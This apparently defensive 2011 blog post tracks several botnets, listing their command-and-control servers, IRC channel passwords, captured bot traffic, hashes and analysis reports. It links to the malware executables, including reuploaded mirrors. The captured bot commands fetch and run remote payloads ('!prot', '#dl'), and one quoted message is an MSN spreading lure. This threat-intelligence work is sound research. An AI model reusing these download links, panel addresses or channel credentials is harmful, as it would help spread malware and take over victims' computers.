Monday, September 12, 2011

BossesLoader + Gbot

(HTTP Side)BossesLoader:
http://3v.irc.su/CET/Panel/
http://3v.irc.su/CET/Panel/bot.php

Post data made from bot:
mode=1
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}

Bot responding to a command:
mode=2
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
version=0.2.0

Process the bot runs as (Win7/Vista):
C:\Users\\AppData\Local\wincsrss.exe


Now we get into the irc side of this criminals server.
(Irc Side)GBot:

Server: 94.23.252.85:4747 (channel: #Gbot)
Topic On: [ #Gbot ] [ !prot http://3v.irc.su/gbot.exe 1 ]
Topic By: [ Ted ]

Hosting Info:
http://whois.domaintools.com/94.23.252.85
(France Ovh Systems)

Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=76d385c04e71cd4808059eebeb459c12fa092c405fac226eb0743ad6f44885c7-1315872197

Analysis:
http://www.threatexpert.com/report.aspx?md5=ea78961231a757f5a592948df290d5d2
http://anubis.iseclab.org/?action=result&task_id=1de6c531e3e513e94ddb15212a0be92d8


Connects to irc server: 94.23.252.85:4747
Irc Conversations:
NICK n{USA|XP}erafhjg
USER n{USA|XP}erafhjg 0 0 :n{USA|XP}erafhjg
JOIN #Gbot GTFO
afhjg 0 0 :n{USA|XP}erafhjg
PONG :7110E098
PRIVMSG #Gbot :[FileProt]: File protection has been enabled for C:\WINDOWS\system32\Dwdjqfihf.exe


Bot reuploaded (For any further analyses):
http://www.mediafire.com/?utnq797aqbp69b2
http://www.multiupload.com/89FOAW25BF

Zues hosted with Turkey Eskisehir National Academic Network And Information Center

http://193.255.81.157/cp.php

Hosting:
http://whois.domaintools.com/193.255.81.157
Hosted with: http://www.ulakbim.gov.tr/ (Possibly a hacked server)

Zues hosted in Lithuania Siauliai Splius Uab

http://charityforcancer.info/donate/help/therapy/funds/thanks/cp.php
Registrar: GoDaddy.com Inc. (R171-LRMS)
Ip: 77.79.9.208

Hosting:
http://www.aleja.lt/
http://whois.domaintools.com/77.79.9.208

Bot:
http://charityforcancer.info/donate/help/therapy/funds/thanks/bot.exe
http://www.mediafire.com/?t42w7wbnh09r7ku
http://www.multiupload.com/MQ3D3TYBE0

Analysis:
http://www.threatexpert.com/report.aspx?md5=8da8384d5602a83b26683bb931769d60
http://anubis.iseclab.org/?action=result&task_id=14d3ea94794834874e582da5b36a31e41

Config:
http://charityforcancer.info/donate/help/therapy/funds/thanks/config.bin
http://www.mediafire.com/?pq0ji6a6c9edaf7
http://www.multiupload.com/785DXO2WZ0

KCA's Botnet

BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net

Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN

Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe

RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe

DorkBot/NgrBot Varients:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe

Other bots used:
The irc also uses Aryan bot, I was unable to acquire an .exe at the time of this analysis.

Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB

KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"



bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"



images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:

Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA



vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:

Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA



bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:

NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="



enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b

Some hf heckers autumn http botnet

http://77.79.11.237/autumn/c.php

http://whois.domaintools.com/77.79.11.237
Hosted with: http://www.aleja.lt/